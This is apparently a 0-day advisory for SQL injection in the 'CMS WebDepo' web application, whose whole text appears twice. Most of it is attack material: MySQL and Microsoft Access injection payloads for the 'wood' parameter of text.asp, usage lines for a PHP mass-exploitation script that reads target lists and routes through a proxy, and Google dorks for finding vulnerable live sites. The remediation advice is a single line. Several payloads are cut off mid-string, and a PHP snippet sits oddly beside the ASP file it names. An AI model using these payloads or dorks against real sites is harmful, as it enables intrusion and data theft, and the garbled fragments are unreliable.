Advisory: SQLi-vulnerabilities in aplication CMS WebDepo
Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day
==========================
Vulnerability Description:
==========================
Records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilitie
==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood']
==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp
Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(
INFORMATION_SCHEMA.CHARACTER_
DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,
FROM MSysAccessObjects%16
Ex: http://target.us/text.asp?
==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/
==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="
==========================
Solution:
==========================
Sanitizing all requests coming from the client
==========================
Credits:
==========================
AUTHOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.
YOUTUBE: http://youtube.com/c/
PLUS: http://google.com/+INURLBrasil
==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/
[2] https://msdn.microsoft.com/en-
Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day
==========================
Vulnerability Description:
==========================
Records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilitie
==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood']
==========================
SQL injection vulnerabilities
==========================
Injection is possible through the file text.asp
Exploit-Example:
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(
INFORMATION_SCHEMA.CHARACTER_
DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,
FROM MSysAccessObjects%16
Ex: http://target.us/text.asp?
==========================
SCRIPT EXPLOIT
==========================
http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
howto: http://blog.inurl.com.br/2015/
==========================
GOOGLE DORK
==========================
inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="
==========================
Solution:
==========================
Sanitizing all requests coming from the client
==========================
Credits:
==========================
AUTHOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.
YOUTUBE: http://youtube.com/c/
PLUS: http://google.com/+INURLBrasil
==========================
References:
==========================
[1] http://blog.inurl.com.br/2015/
[2] https://msdn.microsoft.com/en-